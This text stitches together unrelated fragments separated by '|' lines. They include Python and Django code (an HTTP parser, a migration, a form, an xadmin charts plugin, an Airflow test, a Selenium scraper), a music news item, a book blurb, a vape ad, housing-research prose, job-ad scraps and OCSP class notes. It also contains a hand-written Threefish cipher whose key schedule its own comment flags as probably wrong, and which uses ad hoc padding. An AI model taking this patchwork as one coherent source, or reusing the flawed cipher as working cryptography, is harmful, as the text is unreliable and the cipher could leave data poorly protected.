            raise ParseError("Invalid message")

        # If we got here we have a full request. We need to return useful
        # data. A useful trick here: all the returned char pointers are
        # pointers into buffer. This means we can use them as offsets and
        # return memoryviews to their data. Snazzy, right?
        msg = b''
        status = 0
        minor_version = -1

        status = self._status[0]

        # Reason phrase is a zero-copy slice of the caller's buffer.
        offset = self._msg[0] - phr_buffer
        element_len = self._msg_len[0]
        msg = buffer[offset:offset+element_len]

        minor_version = self._minor_version[0]

        # We can create the Request object now, because all the scalar fields
        # are ready. We can put the headers into a list already hung from it.
        req = Response(status, msg, minor_version, [], pret)
        for header in self._build_headers(phr_buffer, buffer):
            req.headers.append(header)

        return req

    def _build_headers(self, phr_buffer, orig_buffer):
        """
        Called by a parsing routine to build a collection of header names and
        values.

        Yields (name, value) pairs as zero-copy slices of ``orig_buffer``,
        using the pointer-offset trick described in parse_request.
        """
        for index in range(self._num_headers[0]):
            header_struct = self._headers[index]
            name_index = header_struct.name - phr_buffer
            value_index = header_struct.value - phr_buffer
            name_len = header_struct.name_len
            value_len = header_struct.value_len
            name = orig_buffer[name_index:name_index+name_len]
            value = orig_buffer[value_index:value_index+value_len]
            yield (name, value)
|
St. Louis hip hop vets iLLPHONiCS have returned with a new two track bundle, including singles “Work” and “Make Your Move.” The tracks will be included on the band’s new 2019 project titled dv8, and were produced by longtime David Bowie producer Tony Visconti.
“Work” highlights the best parts of hip hop, with traces of influence from artists like The Roots, Tank & the Bangas, and even Anderson .Paak. iLLPHONiCS are seemingly a fine wine – only getting better with time.
Check out “Work” and “Make Your Move” below.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-28 20:35
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """
    Auto-generated initial migration: creates the Language and LanguageSkill
    tables and the UserProfile one-to-one extension of the auth user model.
    Left byte-compatible with the generated operations on purpose.
    """

    # First migration of this app.
    initial = True

    # Depends on the swappable user model, the auth app, and the
    # environment app (for the City foreign key below).
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('auth', '0007_alter_validators_add_error_messages'),
        ('environment', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Language',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(db_index=True, max_length=64, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='LanguageSkill',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('level', models.SmallIntegerField(choices=[(1, 'Basics'), (2, 'Intermediate'), (3, 'Fluent'), (4, 'Native')])),
                ('language', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Language')),
            ],
        ),
        migrations.CreateModel(
            name='UserProfile',
            fields=[
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, related_name='profile', serialize=False, to=settings.AUTH_USER_MODEL)),
                ('role', models.CharField(choices=[('A', 'Admin'), ('R', 'Refugee'), ('M', 'Mentor')], db_index=True, max_length=1)),
                ('phone', models.CharField(blank=True, db_index=True, default='', max_length=32)),
                ('birth_year', models.IntegerField()),
                ('gender', models.CharField(choices=[('M', 'Male'), ('F', 'Female')], max_length=1)),
                ('created', models.DateTimeField(blank=True, db_index=True, default=django.utils.timezone.now, editable=False)),
                ('last_modified', models.DateTimeField(auto_now=True, db_index=True)),
                ('city', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='environment.City')),
            ],
            options={
                'verbose_name': 'User profile',
                'verbose_name_plural': 'User profiles',
            },
        ),
        # Added after UserProfile so the user FK resolves cleanly.
        migrations.AddField(
            model_name='languageskill',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
|
For a limited time only because it's my birthday and I can do a book sale if I want to!
Book #1 in a two part series!
Mags McManus has just become a war widow in her mid-twenties. Her late husband, Randy, left for the Army right after their wedding. Instead of celebrating his homecoming and living in marital bliss with her soulmate, Mags finds herself living in constant agony. Dealing with the guilt of still living without Randy, are Randy's best friends and parents.
Rising from the ashes of this tragedy, Mags starts to learn how to love and trust again, finally being able to find happiness. But sometimes things really are too good to be true and again Mags learns how cruel the world can be as she crashes back down.
Mags McManus is far from a normal woman in her mid-twenties. Being a war widow, a business professional, and a brokenhearted train wreck only skims the surface of the layers of who Margaret McManus truly is. Waking up in a hospital bed, alone and confused, Mags once again has to pick up the pieces of her shattered heart. With her best friends by her side, Mags slowly starts to learn the answers she so desperately longs for. But is everything going to continue to spiral out of control? Or is there a light at the end of this dark, twisting tunnel where all the broken pieces can finally fall back together?
Note from the author: Second book in the two part Crashing Series. Crashing Back Down should be read before Falling Back Together to avoid spoilers. A portion of all royalties from Falling Back Together are donated by the author to The Marcie Mazzola Foundation.
I truly hope there's light at the end of the tunnel, Mags. The books sound great!
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from datetime import datetime
from mock import Mock
from airflow import AirflowException
from airflow.ti_deps.deps.valid_state_dep import ValidStateDep
from airflow.utils.state import State
class ValidStateDepTest(unittest.TestCase):
    """
    Tests for ValidStateDep: the dep is met iff the task instance's state
    is in the allowed set, and an empty set of states is an error.
    """

    @staticmethod
    def _mock_ti(state):
        """Build a minimal mocked task instance in the given state."""
        return Mock(state=state, end_date=datetime(2016, 1, 1))

    def test_valid_state(self):
        """A state contained in the valid set satisfies the dep."""
        self.assertTrue(
            ValidStateDep({State.QUEUED}).is_met(ti=self._mock_ti(State.QUEUED)))

    def test_invalid_state(self):
        """A state outside the valid set fails the dep."""
        self.assertFalse(
            ValidStateDep({State.FAILED}).is_met(ti=self._mock_ti(State.SUCCESS)))

    def test_no_valid_states(self):
        """With no valid states at all, the dep raises AirflowException."""
        with self.assertRaises(AirflowException):
            ValidStateDep({}).is_met(ti=self._mock_ti(State.SUCCESS))
|
The National Housing and Planning Advice Unit (NHPAU) was an independent body set up to advise national and local government and other bodies on the affordability of market housing. Its creation followed Kate Barker’s Review of Housing Supply in 2004 and her recommendation for the creation of a body to provide expert advice on housing matters, particularly affordability. The Unit was governed by an expert Board that was chaired by Professor Stephen Nickell, CBE, FBA, a former member of the Bank of England Monetary Policy Committee, and until 2012, Warden of Nuffield College, Oxford.
As part of its remit, NHPAU considered the implications of the Government’s national ambitions for long-term market affordability and housing supply on the level and broad distribution of future house building, disseminating and helping Government and the regions to develop consistent methodological practice in assessing market housing affordability. NHPAU also commissioned research on issues affecting affordability.
The NHPAU Board commissioned CCHPR to undertake research on the availability and quality of data sources relevant to the work of the NHPAU. This included, among others, data on individual income, household income, earnings, house prices, mortgages, property characteristics, second homes, vacancies, rents, household characteristics, construction, planning, migration and population.
The research project not only covered an assessment of the quality, coverage and comparability of the various data sources but also information on licensing arrangements, access, cost and restrictions on use. Several outputs were required, including briefing notes on the various data sources which could be used by members of the unit, a publication and a formal write-up of the research findings. Attendance at key meetings with data suppliers was also required.
Due to the dispersed nature of the data on affordability and related issues, it was important to ensure that all relevant stakeholders were consulted, and that the data held by these organisations was fully considered.
A good knowledge of the available data sources related to market housing affordability, and their strengths and weaknesses, was essential. It was also important for the research to understand the comparability of different data sources and highlight areas where there is a lack of good quality comprehensive data. This allowed the most appropriate data to be selected for each piece of work undertaken or commissioned by NHPAU researching the affordability of market housing.
|
#encoding: utf-8
from django import forms
from django_select2.forms import ModelSelect2MultipleWidget
# from django.contrib.auth.models import Group
from .models import Problem, ProblemTag
from ojuser.models import GroupProfile
class ProblemForm(forms.ModelForm):
    """
    Form for creating and editing Problem instances, with select2
    multi-select widgets for tag and group selection.
    """

    # NullBooleanField rendered as a plain checkbox; unchecked submits False.
    is_spj = forms.NullBooleanField(widget=forms.CheckboxInput(), initial=False)
    # Tags are optional; groups are required.
    tags = forms.ModelMultipleChoiceField(required=False, queryset=ProblemTag.objects.all(),
                                          widget=ModelSelect2MultipleWidget(
                                              search_fields=[
                                                  'name__icontains',
                                                  'nickname__icontains',
                                              ]))
    groups = forms.ModelMultipleChoiceField(required=True, queryset=GroupProfile.objects.all(),
                                            widget=ModelSelect2MultipleWidget(
                                                search_fields=[
                                                    'name__icontains',
                                                    'nickname__icontains'
                                                ]
                                            ))

    class Meta:
        model = Problem
        exclude = ["superadmin", "is_checked", "created_time", "last_updated_time", "desc",
                   "code_length_limit"]
        # NOTE(review): Django ignores Meta.widgets for fields declared
        # explicitly on the form (groups/tags above), so these overrides are
        # inert; kept for reference.
        widgets = {
            'groups': ModelSelect2MultipleWidget(
                search_fields=[
                    'name__icontains',
                    'nickname__icontains',
                ]
            ),
            'tags': ModelSelect2MultipleWidget(
                search_fields=[
                    'name__icontains'
                ]
            )
        }

    def __init__(self, *args, **kwargs):
        super(ProblemForm, self).__init__(*args, **kwargs)
        # Chinese UI labels for the auto-generated model fields.
        self.fields['title'].label = u"题目"
        self.fields['time_limit'].label = u"运行时间限制"
        # Bug fix: memory_limit was mislabelled with the time-limit text
        # (u"运行时间限制"); use the memory-limit label instead.
        self.fields['memory_limit'].label = u"运行内存限制"
        self.fields['groups'].label = u"所属用户组"
|
Putting a twist on their highly praised fruit concoctions, Milkman has added Menthol alternatives to their original lineup, and that includes the new Milkman E-Juice by Milkman. Making great use of their original mouthwatering fruit flavors, Milkman features a blend of summertime fruits that makes the most of a savory base. During the exhale, an unmistakeable fruit tart flavor is met by subtle vanilla bean undertones to deliver an overwhelming fruit-filled flavor that hydrates and replenishes the taste buds. Every time you take a draw, the fruity flavors dance along your palate elegantly without missing a beat. Mixed with MAX VG, Milkman E-Juice provides a chilly fruit-filled flavor sensation that should be in every vapers e-juice collection!
|
import datetime
import decimal
import calendar
from django.template import loader
from django.http import HttpResponseNotFound
from django.core.serializers.json import DjangoJSONEncoder
from django.http import HttpResponse
from django.utils.encoding import smart_unicode
from django.db import models
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _, ugettext
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, ListAdminView
from xadmin.views.dashboard import ModelBaseWidget, widget_manager
from xadmin.util import lookup_field, label_for_field, force_unicode, json
@widget_manager.register
class ChartWidget(ModelBaseWidget):
    """Dashboard widget listing links to the charts declared on a model admin.

    A model admin exposes charts through a ``data_charts`` dict; this widget
    renders one link per chart, or a single chart when the widget was saved
    with a ``chart`` option.
    """
    widget_type = 'chart'
    description = _('Show models simple chart.')
    template = 'xadmin/widgets/chart.html'
    widget_icon = 'fa fa-bar-chart-o'
    def convert(self, data):
        # Pull widget-specific options out of the stored widget data: extra
        # query params forwarded to the chart view, and an optional single
        # chart name to restrict this widget to.
        self.list_params = data.pop('params', {})
        self.chart = data.pop('chart', None)
    def setup(self):
        """Resolve which charts of the bound model admin this widget shows."""
        super(ChartWidget, self).setup()
        self.charts = {}
        self.one_chart = False
        model_admin = self.admin_site._registry[self.model]
        chart = self.chart
        if hasattr(model_admin, 'data_charts'):
            if chart and chart in model_admin.data_charts:
                # Restrict to the one chart this widget was configured with.
                self.charts = {chart: model_admin.data_charts[chart]}
                self.one_chart = True
                if self.title is None:
                    self.title = model_admin.data_charts[chart].get('title')
            else:
                # No specific chart selected: show all of the admin's charts.
                self.charts = model_admin.data_charts
                if self.title is None:
                    self.title = ugettext(
                        "%s Charts") % self.model._meta.verbose_name_plural
    def filte_choices_model(self, model, modeladmin):
        # Only offer models whose admin actually defines data_charts.
        # ("filte" is xadmin's own spelling of this hook name.)
        return bool(getattr(modeladmin, 'data_charts', None)) and \
            super(ChartWidget, self).filte_choices_model(model, modeladmin)
    def get_chart_url(self, name, v):
        # Chart endpoint registered by ChartsView (bottom of this module),
        # plus the saved list params as a query string.
        return self.model_admin_url('chart', name) + "?" + urlencode(self.list_params)
    def context(self, context):
        context.update({
            'charts': [{"name": name, "title": v['title'], 'url': self.get_chart_url(name, v)} for name, v in self.charts.items()],
        })
    # Media
    def media(self):
        return self.vendor('flot.js', 'xadmin.plugin.charts.js')
class JSONEncoder(DjangoJSONEncoder):
    """JSON encoder for chart payloads.

    Dates and datetimes become JavaScript-style millisecond timestamps
    (what the vendored flot time axis consumes), Decimals become strings,
    and anything Django's encoder rejects falls back to its unicode
    representation instead of raising.
    """
    def default(self, o):
        if isinstance(o, (datetime.date, datetime.datetime)):
            # seconds since epoch (UTC) -> milliseconds
            return calendar.timegm(o.timetuple()) * 1000
        if isinstance(o, decimal.Decimal):
            return str(o)
        try:
            return super(JSONEncoder, self).default(o)
        except Exception:
            return smart_unicode(o)
class ChartsPlugin(BaseAdminPlugin):
    """List-view plugin that injects chart links above the results table."""
    data_charts = {}

    def init_request(self, *args, **kwargs):
        # Activate only when the admin actually declares charts.
        return bool(self.data_charts)

    def get_chart_url(self, name, v):
        # Chart endpoint plus the current list filters as a query string.
        base = self.admin_view.model_admin_url('chart', name)
        return base + self.admin_view.get_query_string()

    # Media
    def get_media(self, media):
        return media + self.vendor('flot.js', 'xadmin.plugin.charts.js')

    # Block Views
    def block_results_top(self, context, nodes):
        chart_links = [
            {"name": name, "title": chart['title'], 'url': self.get_chart_url(name, chart)}
            for name, chart in self.data_charts.items()
        ]
        context.update({'charts': chart_links})
        nodes.append(loader.render_to_string(
            'xadmin/blocks/model_list.results_top.charts.html',
            context_instance=context))
class ChartsView(ListAdminView):
    """Admin view serving one named chart as flot-ready JSON.

    Registered below at ``chart/<name>/`` on the model admin.  Reuses the
    list view machinery (``make_result_list``) to build the queryset.
    """
    data_charts = {}
    def get_ordering(self):
        # A chart may declare its own ordering; otherwise use the list's.
        if 'order' in self.chart:
            return self.chart['order']
        else:
            return super(ChartsView, self).get_ordering()
    def get(self, request, name):
        """Return {'data': series, 'option': flot options} for chart *name*."""
        if name not in self.data_charts:
            return HttpResponseNotFound()
        self.chart = self.data_charts[name]
        # 'x-field' is the abscissa; 'y-field' may be one field or a list.
        self.x_field = self.chart['x-field']
        y_fields = self.chart['y-field']
        self.y_fields = (
            y_fields,) if type(y_fields) not in (list, tuple) else y_fields
        # One series per y field, labelled via the admin's field labels.
        datas = [{"data":[], "label": force_unicode(label_for_field(
            i, self.model, model_admin=self))} for i in self.y_fields]
        self.make_result_list()
        for obj in self.result_list:
            xf, attrs, value = lookup_field(self.x_field, obj, self)
            for i, yfname in enumerate(self.y_fields):
                yf, yattrs, yv = lookup_field(yfname, obj, self)
                datas[i]["data"].append((value, yv))
        option = {'series': {'lines': {'show': True}, 'points': {'show': False}},
                  'grid': {'hoverable': True, 'clickable': True}}
        # Switch the x axis into time mode for date/time model fields.
        try:
            xfield = self.opts.get_field(self.x_field)
            if type(xfield) in (models.DateTimeField, models.DateField, models.TimeField):
                option['xaxis'] = {'mode': "time", 'tickLength': 5}
                if type(xfield) is models.DateField:
                    option['xaxis']['timeformat'] = "%y/%m/%d"
                elif type(xfield) is models.TimeField:
                    option['xaxis']['timeformat'] = "%H:%M:%S"
                else:
                    option['xaxis']['timeformat'] = "%y/%m/%d %H:%M:%S"
        except Exception:
            pass
        # Chart-level option overrides win over the defaults above.
        option.update(self.chart.get('option', {}))
        content = {'data': datas, 'option': option}
        result = json.dumps(content, cls=JSONEncoder, ensure_ascii=False)
        return HttpResponse(result)
# Wire the plugin into every model list view and expose the chart endpoint
# at <model-admin>/chart/<name>/.
site.register_plugin(ChartsPlugin, ListAdminView)
site.register_modelview(r'^chart/(.+)/$', ChartsView, name='%s_%s_chart')
|
cell culture, and processing human blood samples.
flexibility to work in a start-up environment.
healthcare benefits and a 401(k) plan.
|
#Funções de bitwise:
#Como tivemos problemas de tipagem, utilizamos um tipo próprio para a criptografia
#No caso, um array de 1s e 0s representando bits.
#E, claro, tivemos que criar operadores pra agir sobre esse novo "tipo".
def xor(a, b):
    """Bitwise XOR of two 8-bit vectors (lists of 0/1, MSB first)."""
    return [a[i] ^ b[i] for i in range(8)]
def mod(a, b):
    """Bitwise AND of two 8-bit vectors (despite the name, this is AND)."""
    return [a[i] & b[i] for i in range(8)]
def add(a, b):
    """Ripple-carry addition of two 8-bit vectors, modulo 256 (carry out dropped)."""
    out = [0] * 8
    carry = 0
    for pos in reversed(range(8)):
        out[pos] = a[pos] ^ b[pos] ^ carry
        # majority(a, b, carry) is the carry into the next (more significant) bit
        carry = (a[pos] & b[pos]) | (a[pos] & carry) | (b[pos] & carry)
    return out
def comp(a):
    """Two's complement (arithmetic negation mod 256) of an 8-bit vector."""
    value = 0
    for bit in a:
        value = (value << 1) | bit
    negated = (256 - value) % 256
    return [(negated >> shift) & 1 for shift in range(7, -1, -1)]
def rol(a, b):
    """Rotate the 8-bit vector a left by b positions (b taken mod 8)."""
    q = b % 8
    return a[q:] + a[:q]
def ror(a, b):
    """Rotate the 8-bit vector a right by b positions (b taken mod 8)."""
    q = b % 8
    return a[8 - q:] + a[:8 - q]
#Funções da criptografia em si:
def permute(v, c=True):
    """Apply the fixed 8-word permutation (c=True) or its inverse (c=False)."""
    p = {True: [2, 1, 4, 7, 6, 5, 0, 3], False: [6, 1, 0, 7, 2, 5, 4, 3]}
    return [v[i] for i in p[c]]
def mix(x0, x1, j, d, c=True):
    """One Threefish MIX step on the word pair (x0, x1); inverse when c=False."""
    # Fixed rotation constants from the algorithm description.
    rotation = [[46, 33, 17, 44, 39, 13, 25, 8],
                [36, 27, 49, 9, 30, 50, 29, 35],
                [19, 14, 36, 54, 34, 10, 39, 56],
                [37, 42, 39, 56, 24, 17, 43, 22]]
    r = rotation[j][d % 8]
    if c:
        y0 = add(x0, x1)
        y1 = xor(rol(x1, r), y0)
        return y0, y1
    y1 = ror(xor(x0, x1), r)
    y0 = add(x0, comp(y1))  # subtraction: add the two's complement
    return y0, y1
def key_schedule( k, t ):
    """Expand key k and tweak t into 19 subkey lists of 8 words each.

    k and t are lists of 8-bit vectors (see to_bit).  A parity word is
    appended to both before the subkeys are derived, following the
    Threefish key schedule.
    """
    ks = []
    # 0x1BD11BDA... is the Threefish key-schedule constant, a
    # nothing-up-my-sleeve number explained in the Skein specification PDF.
    kn = to_bit( 0x1BD11BDAA9FC1A22.to_bytes( 8, "big" ) ) #Nw - 1 iterations below
    for i in range( 7 ): #Nw - 1
        # NOTE(review): kn is replaced by xor's flat 8-bit result on the
        # first pass, so subsequent iterations take kn[0] from a flat bit
        # list rather than a word list -- confirm this parity computation
        # against the Skein specification.
        kn = xor( kn[0], k[i])
    t2 = xor( t[1], t[2] )
    t.extend(t2)
    k.extend(kn)
    for i in range( 19 ): #Nr/4 + 1
        s = [None] * 8
        for j in range( 5 ):
            s[j] = k[ ( i + j ) % 9 ]
        s[5] = add( k[ ( i + 5 ) % 9 ], t[ i % 3 ] )
        s[6] = add( k[ ( i + 6 ) % 9 ], t[ ( i + 1 ) % 3 ] )
        s[7] = add( k[ ( i + 7 ) % 9 ], to_bit( [i] )[0] )
        ks.append( s )
    return ks
#Algoritmo implementado a partir das instruções oficiais, disponiveis em:
#https://www.schneier.com/academic/paperfiles/skein1.3.pdf
#Nossa sugestão para melhorar seria adicionar um timestamp junto a mensagem a ser cifrada, que seria análisado pela aplicação.
#Isso impediria cópias de mensagens sniffadas.
def Threefish( w, k, t, c = True ):
    """Threefish block cipher over 8-byte blocks of w.

    w: plaintext (str or list of byte values) when c=True, or ciphertext
    byte values when c=False.  k: key, t: tweak.  Returns a list of byte
    values when encrypting, or the unpadded plaintext string when
    decrypting.

    Implemented from the official description:
    https://www.schneier.com/academic/paperfiles/skein1.3.pdf
    """
    w = to_bit( w )
    k = to_bit( k )
    t = to_bit( t )
    ks = key_schedule( k, t )
    result = []
    # Process w in blocks of 8 bytes (64 bits).
    for k in range( 0, len( w ), 8 ):
        block = w[k:k+8]
        if( c ):
            for i in range( 72 ):
                # Inject a subkey every fourth round.
                if( ( i % 4 ) == 0 ):
                    for j in range( 8 ):
                        block[j] = add( block[j], ks[int( i/4 )][j] )
                for j in range( 4 ):
                    block[2*j], block[2*j+1] = mix( block[2*j], block[2*j+1], j, i, True )
                block = permute( block, True )
        else:
            # Decryption: run the 72 rounds in reverse with inverse steps.
            for i in range( 71, -1, -1 ):
                block = permute( block, False )
                for j in range( 4 ):
                    block[2*j], block[2*j+1] = mix( block[2*j], block[2*j+1], j, i, False )
                if( ( i % 4 ) == 0 ):
                    for j in range( 8 ):
                        # Subtract the subkey by adding its two's complement.
                        block[j] = add( block[j], comp( ks[int( i/4 )][j] ) )
        result.extend( block )
    if c:
        return from_bit( result )
    else:
        # Rebuild the text and strip the length padding added by pad().
        padwan = ""
        for digit in from_bit( result ):
            padwan += chr( digit )
        return pad( padwan, False )
#Abaixo, funções de conversão de string/int para um vetor de bits.
#Por problemas de tipagem, bytes davam erro no endereçamento, strings nas operações, e inteiros no numero de casas.
#(BTW, a função nativa bin() retorna uma string, por isso tive q fazer na mão)
#Esse ficou bonito ;)
def to_bit(data):
    """Convert a string (padded first) or iterable of byte values into a
    list of 8-bit vectors (lists of 0/1, MSB first)."""
    if isinstance(data, str):
        data = [ord(ch) for ch in pad(data)]
    return [[1 if ch == "1" else 0 for ch in bin(value)[2:].zfill(8)]
            for value in data]
#Esse nem tanto =/
def from_bit(data):
    """Convert a list of 8-bit vectors (MSB first) back to byte values."""
    return [sum(bits[7 - i] << i for i in range(8)) for bits in data]
#Padding especial que eu vi por aí mas não lembro o nome
#Adiciona como algarismo de pad o numero de casas cobertas, assim nunca exclui um caractér errado
#(Exceto caso a frase termine com um "1" e seja múltiplo de 8. Mas é bem mais border q acabar com 0, dos pads normais)
def pad(w, c=True):
    """Length padding: extend w to a multiple of 8 characters (c=True) or
    strip that padding (c=False).

    The pad digit is the number of characters added, repeated that many
    times, so stripping never removes a wrong character (except the corner
    case of data that already ends with matching digits).
    """
    text = w[:]
    if c:
        missing = -len(text) % 8
        if missing:
            text += str(missing) * missing
        return text
    # Unpad: the last character says how many pad characters to check/strip.
    try:
        count = int(text[-1])
        for pos in range(-1, -count - 1, -1):
            if int(text[pos]) != count:
                raise ValueError
        return text[:-count]
    except Exception:
        return text  # padding check failed -- return unchanged
def example_use( w = "Frase de Exemplo", k = "gurulhu!", t = "oi"):
    """Demo round-trip: encrypt w with key k and tweak t, then decrypt it."""
    print("Plaintext: ", w, "\nKey: ", k, "\nTweak: ", t )
    cy = Threefish( w, k, t )
    print("\nCypher:", [ chr( i ) for i in cy] )
    # Decrypt the ciphertext again; the result should match the plaintext.
    cy = Threefish( cy, k, t, False )
    print("\nResult: ", cy )
# CLI: encrypt a text file (default) or decrypt a file containing one byte
# value per line (4th argument falsy).
if __name__ == "__main__":
    import sys
    if len( sys.argv ) < 5:
        print("Usage: threefish [plaintext] [key] [tweak] [encript]")
    else:
        if( sys.argv[4] in ["FALSE", "False", "false", "F", "f", "0", "D", "U", "d", "u", 0] ):
            # Decrypt: the input file holds one integer byte value per line.
            with open( sys.argv[1] ) as plainfile:
                plaintext = [ int( c ) for c in plainfile.readlines() ]
            print( Threefish( w = plaintext, k = sys.argv[2], t = sys.argv[3], c = False ) )
        else:
            # Encrypt: print one ciphertext byte value per line.
            with open( sys.argv[1] ) as plainfile:
                plaintext = plainfile.read()
            [ print( c ) for c in Threefish( w = plaintext, k = sys.argv[2], t = sys.argv[3] ) ]
|
Classes for dealing with the Online Certificate Status Protocol (OCSP) - RFC 2560.
BasicOCSPRespGenerator Generator for basic OCSP response objects.
OCSPRespGenerator base generator for an OCSP response - at the moment this only supports the generation of responses containing BasicOCSP responses.
RespID Carrier for a ResponderID.
|
# -- coding: utf-8 --
#-------------------------------------------------------------------------------
# Name: parser
# Purpose:
#
# Author: Ramakrishna
#
# Created: 08/09/2015
# Copyright: (c) Ramakrishna 2015
# Licence: <your licence>
#-------------------------------------------------------------------------------
import sqlite3, time
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException
from selenium.webdriver.common.keys import Keys
from bs4 import BeautifulSoup, SoupStrainer
import urllib
BASE_URL = 'https://www.getpopulrrewards.com'
def main():
    """Scrape product data from getpopulrrewards.com into gppr.db3.

    Reads pending category/subcategory links from the `links` table, walks
    each category's paginated product list in Firefox, opens every product
    in a background tab, extracts name / item number / points / image URL /
    description with BeautifulSoup, inserts complete rows into `records`,
    downloads the product image, and marks the link done.
    """
    conn = driver = None
    try:
        driver = webdriver.Firefox()
        conn = sqlite3.connect("gppr.db3")
        cur = conn.cursor()
        # Pending category links queued by a previous step.
        cur.execute("select id, catg, subcatg from links where done = 0 order by id")
        review_urls = cur.fetchall()
        driver.get('https://www.getpopulrrewards.com')
        time.sleep(3)
        for url in review_urls:
            id = url[0]
            catg = url[1]
            subcatg = url[2]
            next_page = ''
            print catg, subcatg
            # Navigate: SHOP ALL -> category -> subcategory.
            try:
                driver.find_element_by_link_text('SHOP ALL').click()
                time.sleep(1)
                driver.find_element_by_link_text(catg).click()
                time.sleep(1)
                driver.find_element_by_link_text(subcatg).click()
                time.sleep(1)
            except NoSuchElementException as e:
                print(e.__doc__)
                print(e.args)
                pass
            try:
                main_window = driver.current_window_handle
                # Locate the pagination control; next_page stays '' when
                # there is only one page so the while loop still runs once.
                try:
                    pager = driver.find_element_by_class_name("pagination")
                    lis = pager.find_elements_by_tag_name("li")
                    if lis != None and len(lis) >= 3:
                        l = lis[3]
                        if l.find_element_by_tag_name('a') != None:
                            next_page = l.find_element_by_tag_name('a')
                        else:
                            next_page = '' # empty string as we want it to loop through the first page
                except NoSuchElementException as e:
                    next_page = ''
                    print(e.__doc__)
                    print(e.args)
                    pass
                while next_page != None:
                    links = driver.find_elements_by_class_name("shortDescription")
                    time.sleep(1)
                    for link in links:
                        name = points = item_no = prod_url = descr = notes = None
                        # Open the product in a new tab and switch to it.
                        elem = link.find_element_by_tag_name('a')
                        elem.send_keys(Keys.CONTROL + Keys.RETURN)
                        driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + Keys.TAB)
                        time.sleep(1)
                        second_window = driver.current_window_handle
                        driver.switch_to_window(second_window)
                        soup = BeautifulSoup(driver.page_source, parse_only=SoupStrainer('body'))
                        if soup != None:
                            try:
                                div_name = soup.find('span', {'id':'itemName'})
                                if div_name != None:
                                    name = div_name.text.strip()
                            except NoSuchElementException as e:
                                print(e.__doc__)
                                print(e.args)
                                print "name not found"
                                pass
                            try:
                                div_item_no = soup.find('span', {'id':'itemNo'})
                                if div_item_no != None:
                                    item_no = div_item_no.text
                            except NoSuchElementException as e:
                                print(e.__doc__)
                                print(e.args)
                                print "item no not found"
                                pass
                            # The selected gallery slide carries the image URL
                            # in its inline style attribute.
                            selected = soup.find('div', {'state':'selected'})
                            if selected != None:
                                url = selected['style']
                                prod_url = url[url.find("https"):url.find("?")]
                                #Save image locally
                                urllib.urlretrieve(prod_url, "images/" + item_no + ".jpg")
                            try:
                                desc = soup.find('div', {'id':'itemDescr'})
                                if desc != None:
                                    descr = desc.getText("$$$")
                                    '''
                                    for d in desc.contents:
                                        if d != None:
                                            d = str(d)
                                            descr += d.strip() if d != None else ''
                                    '''
                            except NoSuchElementException as e:
                                print(e.__doc__)
                                print(e.args)
                                print "desc not found"
                                pass
                            '''
                            try:
                                note = soup.find('div', {'class':'itemSummary'})
                                if note != None:
                                    note = note.contents
                                    for n in note:
                                        n = n.text.encode('ascii', 'ignore').decode('ascii').replace('\n','').strip()
                                        notes += n + " "
                            except NoSuchElementException as e:
                                print(e.__doc__)
                                print(e.args)
                                print "item summary not found"
                                pass
                            '''
                            try:
                                div_points = soup.find_all('p', {'class':'points'})
                                if div_points != None:
                                    for p in div_points:
                                        if p.text.strip() != '':
                                            points = p.text.strip()
                                            break
                            except NoSuchElementException as e:
                                print(e.__doc__)
                                print(e.args)
                                print "points not found"
                                pass
                        sql = "insert into records(name, catg, subcatg, points, item_no, img_url, descr) values (?,?,?,?,?,?,?)"
                        #print name, catg, subcatg, points, item_no, prod_url, descr
                        print catg, subcatg, name
                        # Only store rows where all key fields were found.
                        if name != None and points != None and item_no != None and prod_url != None:
                            cur.execute(sql, (name, catg, subcatg, points, item_no, prod_url, descr))
                        # Close the product tab and return to the list page.
                        driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 'w')
                        time.sleep(1)
                    driver.switch_to_window(main_window)
                    cur.execute("update links set done = 1 where id = ? and done = 0", (str(id),))
                    conn.commit()
                    # Advance to the next page, or stop when none is left.
                    try:
                        next_page = None
                        pager = driver.find_element_by_class_name("pagination")
                        lis = pager.find_elements_by_tag_name("li")
                        if lis != None and len(lis) >= 3:
                            l = lis[3]
                            if l.find_element_by_tag_name('a') != None:
                                next_page = l.find_element_by_tag_name('a')
                                next_page.click()
                            else:
                                next_page = None
                    except IndexError as e:
                        print(e.__doc__)
                        print(e.args)
                        pass
                    except NoSuchElementException as e:
                        print(e.__doc__)
                        print(e.args)
                        pass
                driver.switch_to_window(main_window)
            except NoSuchElementException as e:
                print(e.__doc__)
                print(e.args)
                pass
    except Exception as e:
        print(e.__doc__)
        print(e.args)
    finally:
        # Always persist what was collected and release browser/db handles.
        if conn != None:
            conn.commit()
            conn.close()
        if driver != None:
            driver.close()
# Script entry point.
if __name__ == '__main__':
    main()
|
Why Is An Elevated Work Platform License So Important?
